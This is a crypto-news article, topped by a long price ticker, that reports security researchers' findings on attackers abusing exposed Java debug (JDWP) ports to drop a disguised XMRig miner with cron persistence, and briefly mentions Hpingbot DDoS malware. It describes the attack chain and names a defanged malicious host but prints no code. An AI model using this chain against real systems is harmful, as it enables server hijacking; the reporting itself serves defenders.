• bitcoinBitcoin (BTC) $ 90,289.00
  • ethereumEthereum (ETH) $ 2,972.19
  • tetherTether (USDT) $ 0.998933
  • xrpXRP (XRP) $ 2.08
  • bnbBNB (BNB) $ 893.11
  • usd-coinUSDC (USDC) $ 0.999704
  • tronTRON (TRX) $ 0.285949
  • staked-etherLido Staked Ether (STETH) $ 2,973.23
  • dogecoinDogecoin (DOGE) $ 0.153284
  • cardanoCardano (ADA) $ 0.456970
  • figure-helocFigure Heloc (FIGR_HELOC) $ 1.03
  • whitebitWhiteBIT Coin (WBT) $ 59.63
  • wrapped-stethWrapped stETH (WSTETH) $ 3,628.52
  • wrapped-bitcoinWrapped Bitcoin (WBTC) $ 90,092.00
  • zcashZcash (ZEC) $ 660.26
  • wrapped-beacon-ethWrapped Beacon ETH (WBETH) $ 3,219.80
  • hyperliquidHyperliquid (HYPE) $ 38.29
  • bitcoin-cashBitcoin Cash (BCH) $ 485.10
  • chainlinkChainlink (LINK) $ 13.32
  • usdsUSDS (USDS) $ 0.999717
  • binance-bridged-usdt-bnb-smart-chainBinance Bridged USDT (BNB Smart Chain) (BSC-USD) $ 0.998315
  • leo-tokenLEO Token (LEO) $ 9.37
  • stellarStellar (XLM) $ 0.244105
  • wethWETH (WETH) $ 2,975.94
  • wrapped-eethWrapped eETH (WEETH) $ 3,218.21
  • ethena-usdeEthena USDe (USDE) $ 0.997646
  • litecoinLitecoin (LTC) $ 92.11
  • moneroMonero (XMR) $ 364.81
  • coinbase-wrapped-btcCoinbase Wrapped BTC (CBBTC) $ 90,302.00
  • hedera-hashgraphHedera (HBAR) $ 0.144053
  • avalanche-2Avalanche (AVAX) $ 14.22
  • suiSui (SUI) $ 1.58
  • shiba-inuShiba Inu (SHIB) $ 0.000009
  • daiDai (DAI) $ 0.999787
  • uniswapUniswap (UNI) $ 7.05
  • ethena-staked-usdeEthena Staked USDe (SUSDE) $ 1.20
  • polkadotPolkadot (DOT) $ 2.67
  • the-open-networkToncoin (TON) $ 1.73
  • crypto-com-chainCronos (CRO) $ 0.107928
  • usdt0USDT0 (USDT0) $ 0.998120
  • susdssUSDS (SUSDS) $ 1.08
  • world-liberty-financialWorld Liberty Financial (WLFI) $ 0.136408
  • memecoreMemeCore (M) $ 2.15
  • canton-networkCanton (CC) $ 0.101234
  • mantleMantle (MNT) $ 1.09
  • paypal-usdPayPal USD (PYUSD) $ 1.00
  • bittensorBittensor (TAO) $ 324.78
  • nearNEAR Protocol (NEAR) $ 2.30
  • usd1-wlfiUSD1 (USD1) $ 0.998299
  • internet-computerInternet Computer (ICP) $ 4.92
  • aster-2Aster (ASTER) $ 1.31
  • aaveAave (AAVE) $ 173.28
  • c1usdCurrency One USD (C1USD) $ 1.00
  • bitget-tokenBitget Token (BGB) $ 3.58
  • blackrock-usd-institutional-digital-liquidity-fundBlackRock USD Institutional Digital Liquidity Fund (BUIDL) $ 1.00
  • okbOKB (OKB) $ 109.01
  • ethereum-classicEthereum Classic (ETC) $ 14.18
  • falcon-financeFalcon USD (USDF) $ 0.998051
  • tether-goldTether Gold (XAUT) $ 4,051.12
  • aptosAptos (APT) $ 2.83
  • pepePepe (PEPE) $ 0.000005
  • pi-networkPi Network (PI) $ 0.237241
  • ethenaEthena (ENA) $ 0.263011
  • jito-staked-solJito Staked SOL (JITOSOL) $ 167.89
  • jupiter-perpetuals-liquidity-provider-tokenJupiter Perpetuals Liquidity Provider Token (JLP) $ 4.63
  • pump-funPump.fun (PUMP) $ 0.003094
  • binance-peg-wethBinance-Peg WETH (WETH) $ 2,978.70
  • solanaWrapped SOL (SOL) $ 134.90
  • ondo-financeOndo (ONDO) $ 0.524425
  • htx-daoHTX DAO (HTX) $ 0.000002
  • hash-2Provenance Blockchain (HASH) $ 0.030506
  • worldcoin-wldWorldcoin (WLD) $ 0.662805
  • kucoin-sharesKuCoin (KCS) $ 11.83
  • polygon-ecosystem-tokenPOL (ex-MATIC) (POL) $ 0.144570
  • official-trumpOfficial Trump (TRUMP) $ 6.77
  • pax-goldPAX Gold (PAXG) $ 4,063.27
  • usdtbUSDtb (USDTB) $ 0.996917
  • filecoinFilecoin (FIL) $ 1.85
  • algorandAlgorand (ALGO) $ 0.151036
  • bfusdBFUSD (BFUSD) $ 0.998895
  • cosmosCosmos Hub (ATOM) $ 2.71
  • syrupusdcsyrupUSDC (SYRUPUSDC) $ 1.14
  • rocket-pool-ethRocket Pool ETH (RETH) $ 3,412.74
  • binance-bridged-usdc-bnb-smart-chainBinance Bridged USDC (BNB Smart Chain) (USDC) $ 0.999519
  • arbitrumArbitrum (ARB) $ 0.227052
  • kinetic-staked-hypeKinetiq Staked HYPE (KHYPE) $ 38.66
  • gatechain-tokenGate (GT) $ 10.55
  • vechainVeChain (VET) $ 0.014241
  • binance-staked-solBinance Staked SOL (BNSOL) $ 146.25
  • wbnbWrapped BNB (WBNB) $ 893.50
  • hashnote-usycCircle USYC (USYC) $ 1.11
  • syrupusdtsyrupUSDT (SYRUPUSDT) $ 1.10
  • global-dollarGlobal Dollar (USDG) $ 0.999687
  • starknetStarknet (STRK) $ 0.248316
  • skySky (SKY) $ 0.049511
  • ripple-usdRipple USD (RLUSD) $ 1.00
  • quant-networkQuant (QNT) $ 77.20
  • kaspaKaspa (KAS) $ 0.041985
  • ignition-fbtcFunction FBTC (FBTC) $ 90,556.00
  • kelp-dao-restaked-ethKelp DAO Restaked ETH (RSETH) $ 3,146.63
  • flare-networksFlare (FLR) $ 0.013434
  • render-tokenRender (RENDER) $ 2.01
  • lombard-staked-btcLombard Staked BTC (LBTC) $ 90,425.00
  • liquid-staked-ethereumLiquid Staked ETH (LSETH) $ 3,186.49
  • morphoMorpho (MORPHO) $ 1.85
  • dashDash (DASH) $ 76.94
  • first-digital-usdFirst Digital USD (FDUSD) $ 0.997350
  • solv-btcSolv Protocol BTC (SOLVBTC) $ 89,812.00
  • nexoNEXO (NEXO) $ 0.944832
  • sei-networkSei (SEI) $ 0.146141
  • story-2Story (IP) $ 2.77
  • renzo-restaked-ethRenzo Restaked ETH (EZETH) $ 3,166.68
  • xdce-crowd-saleXDC Network (XDC) $ 0.049180
  • superstate-short-duration-us-government-securities-fund-ustbSuperstate Short Duration U.S. Government Securities Fund (USTB) (USTB) $ 10.90
  • fetch-aiArtificial Superintelligence Alliance (FET) $ 0.322872
  • jupiter-exchange-solanaJupiter (JUP) $ 0.257331
  • bonkBonk (BONK) $ 0.000010
  • rainRain (RAIN) $ 0.003384
  • ousgOUSG (OUSG) $ 113.34
  • pancakeswap-tokenPancakeSwap (CAKE) $ 2.29
  • janus-henderson-anemoy-aaa-clo-fundJanus Henderson Anemoy AAA CLO Fund (JAAA) $ 1.01
  • mantle-staked-etherMantle Staked Ether (METH) $ 3,214.95
  • pudgy-penguinsPudgy Penguins (PENGU) $ 0.011840
  • fasttokenFasttoken (FTN) $ 1.71
  • virtual-protocolVirtuals Protocol (VIRTUAL) $ 1.12
  • arbitrum-bridged-wbtc-arbitrum-oneArbitrum Bridged WBTC (Arbitrum One) (WBTC) $ 90,012.00
  • aerodrome-financeAerodrome Finance (AERO) $ 0.795229
  • optimismOptimism (OP) $ 0.373418
  • clbtcclBTC (CLBTC) $ 91,080.00
  • ondo-us-dollar-yieldOndo US Dollar Yield (USDY) $ 1.09
  • injective-protocolInjective (INJ) $ 6.46
  • jupiter-staked-solJupiter Staked SOL (JUPSOL) $ 155.70
  • celestiaCelestia (TIA) $ 0.757032
  • lido-daoLido DAO (LDO) $ 0.711832
  • beldexBeldex (BDX) $ 0.083333
  • blockstackStacks (STX) $ 0.341146
  • telcoinTelcoin (TEL) $ 0.006445
  • curve-dao-tokenCurve DAO (CRV) $ 0.425823
  • polygon-pos-bridged-dai-polygon-posPolygon PoS Bridged DAI (Polygon POS) (DAI) $ 1.00
  • stakewise-v3-osethStakeWise Staked ETH (OSETH) $ 3,050.74
  • bridged-usdc-polygon-pos-bridgePolygon Bridged USDC (Polygon PoS) (USDC.E) $ 0.999683
  • l2-standard-bridged-weth-baseL2 Standard Bridged WETH (Base) (WETH) $ 2,980.15
  • myx-financeMYX Finance (MYX) $ 3.05
  • the-graphThe Graph (GRT) $ 0.054464
  • usdaiUSDai (USDAI) $ 0.999737
  • tezosTezos (XTZ) $ 0.530866
  • tbtctBTC (TBTC) $ 89,923.00
  • newton-projectAB (AB) $ 0.006467
  • msolMarinade Staked SOL (MSOL) $ 180.88
  • ether-fiEther.fi (ETHFI) $ 0.897053
  • usual-usdUsual USD (USD0) $ 0.997219
  • decredDecred (DCR) $ 31.81
  • iotaIOTA (IOTA) $ 0.124052
  • mantle-bridged-usdt-mantleMantle Bridged USDT (Mantle) (USDT) $ 0.999242
  • spx6900SPX6900 (SPX) $ 0.534254
  • flokiFLOKI (FLOKI) $ 0.000051
  • arbitrum-bridged-weth-arbitrum-oneArbitrum Bridged WETH (Arbitrum One) (WETH) $ 2,968.09
  • true-usdTrueUSD (TUSD) $ 0.995999
  • cgeth-hashkey-cloudcgETH Hashkey Cloud (CGETH.HASH) $ 2,460.42
  • kaiaKaia (KAIA) $ 0.082608
  • pyth-networkPyth Network (PYTH) $ 0.083783
  • trust-wallet-tokenTrust Wallet (TWT) $ 1.13
  • ethereum-name-serviceEthereum Name Service (ENS) $ 12.17
  • stader-ethxStader ETHx (ETHX) $ 3,194.13
  • gtethGTETH (GTETH) $ 2,976.40
  • conflux-tokenConflux (CFX) $ 0.088634
  • ether-fi-liquid-ethEther.Fi Liquid ETH (LIQUIDETH) $ 3,139.41
  • the-sandboxThe Sandbox (SAND) $ 0.173709
  • ghoGHO (GHO) $ 0.999181
  • usddUSDD (USDD) $ 0.998648
  • sonic-3Sonic (S) $ 0.119664
  • steakhouse-usdc-morpho-vaultSteakhouse USDC Morpho Vault (STEAKUSDC) $ 1.11
  • doublezeroDoubleZero (2Z) $ 0.126045
  • plasmaPlasma (XPL) $ 0.230196
  • soon-2SOON (SOON) $ 1.22
  • eutblSpiko EU T-Bills Money Market Fund (EUTBL) $ 1.20
  • bitcoin-svBitcoin SV (BSV) $ 21.53
  • ether-fi-staked-ethether.fi Staked ETH (EETH) $ 2,974.88
  • wrapped-hypeWrapped HYPE (WHYPE) $ 38.58
  • flowFlow (FLOW) $ 0.258541
  • sun-tokenSun Token (SUN) $ 0.021862
  • bittorrentBitTorrent (BTT) $ 0.00000042
  • syrupMaple Finance (SYRUP) $ 0.357480
  • usdbUSDB (USDB) $ 0.995426
  • swethSwell Ethereum (SWETH) $ 3,272.18
  • theta-tokenTheta Network (THETA) $ 0.397649
  • dogwifcoindogwifhat (WIF) $ 0.392526
  • binance-peg-dogecoinBinance-Peg Dogecoin (DOGE) $ 0.153383
  • sbtc-2sBTC (SBTC) $ 89,299.00
  • jasmycoinJasmyCoin (JASMY) $ 0.007897
  • coinbase-wrapped-staked-ethCoinbase Wrapped Staked ETH (CBETH) $ 3,289.13
  • heliumHelium (HNT) $ 2.09
  • pendlePendle (PENDLE) $ 2.36
  • galaGALA (GALA) $ 0.008312
  • merlin-chainMerlin Chain (MERL) $ 0.367207
  • apenftAINFT (NFT) $ 0.00000039
  • ape-and-pepeApe and Pepe (APEPE) $ 0.000002
  • bitcoin-avalanche-bridged-btc-bAvalanche Bridged BTC (Avalanche) (BTC.B) $ 90,517.00
  • justJUST (JST) $ 0.037914
  • vaultaVaulta (A) $ 0.227553
Bitcoin

Hackers attack servers to mine cryptocurrencies

By admin
0 43

Hackers attack servers to mine cryptocurrencies

Hackers are now attacking systems to carry out crypto mining activities, according to a report from researchers from cloud security firm Wiz. The researchers stated that the hackers are weaponizing exposed Java Debug Wire Protocol (JDWP) interfaces to obtain code execution capabilities on compromised systems.

According to the report, after gaining code execution capabilities, the hackers deployed crypto miners on the systems of their compromised hosts. “The attacker used a modified version of XMRig with a hard-coded configuration, allowing them to avoid suspicious command-line arguments that are often flagged by defenders,” the researchers said. They added that the payload used mining pool proxies to conceal the attacker’s crypto wallet, preventing investigators from tracing it further.

Hackers weaponize exposed JDWP to carry out mining activities

The researchers observed the activity against their honeypot servers running TeamCity, a popular continuous integration and continuous delivery (CI/CD) tool. JDWP is a communication protocol used in Java for debugging. With the protocol, the debugger can be used to work on different processes, a Java application on the same computer, or a remote computer.

However, due to the fact that JDWP lacks an access control mechanism, exposing it to the internet can open up new attack vectors that hackers can abuse as an entry point to enable full control over the running Java process. To simplify it, the misconfiguration can be used to inject and execute arbitrary commands in order to set up persistence on and ultimately run malicious payloads.

“While JDWP is not enabled by default in most Java applications, it is commonly used in development and debugging environments,” the researchers said. “Many popular applications automatically start a JDWP server when run in debug mode, often without making the risks obvious to the developer. If improperly secured or left exposed, this can open the door to remote code execution (RCE) vulnerabilities.”

Some of the applications that may launch a JDWP server when in debug mode include TeamCity, Apache Tomcat, Spring Boot, Elasticsearch, Jenkins, and others. Data from GreyNoise showed that over 2,600 IP addresses have been scanned for JDWP endpoints in the last 24 hours, out of which 1,500 IP addresses are malicious and 1,100 are classified as suspicious. The report mentioned that most of these IP addresses originated from Hong Kong, Germany, the United States, Singapore, and China.

The researchers detail how the attacks are being carried out

In the attacks observed by the researchers, the hackers take advantage of the fact that the Java Virtual Machine (JVM) listens for debugger connections on port 5005 to initiate scanning for open JDWP ports across the internet. After that, a JDWP-Handshake request is sent to confirm if the interface is active. Once it confirms that the service is exposed and interactive, the hackers move to execute a command to fetch, carrying out a dropper shell script that is expected to carry out a series of actions.

These series of actions include killing all competing miners or any high-CPU processes on the system, dropping a modified version of XMRig miner for the appropriate system architecture from an external server (“awarmcorner[.]world”) into “~/.config/logrotate”), establishing persistence by setting cron jobs to ensure that payload is re-fetched and re-executed after every shell login, reboot, or scheduled time interval, and delete itself on exit.

“Being open-source, XMRig offers attackers the convenience of easy customization, which in this case involved stripping out all command-line parsing logic and hardcoding the configuration,” the researchers said. “This tweak not only simplifies deployment but also allows the payload to mimic the original logrotate process more convincingly.”

This disclosure comes as NSFOCUS noted that a new and evolving Go-based malware named Hpingbot that has been targeting both Windows and Linux systems can launch a distributed denial-of-service (DDoS) attack using hping3.

Source

admin 15209 posts 0 comments
You might also like More from author

Leave A Reply

Your email address will not be published.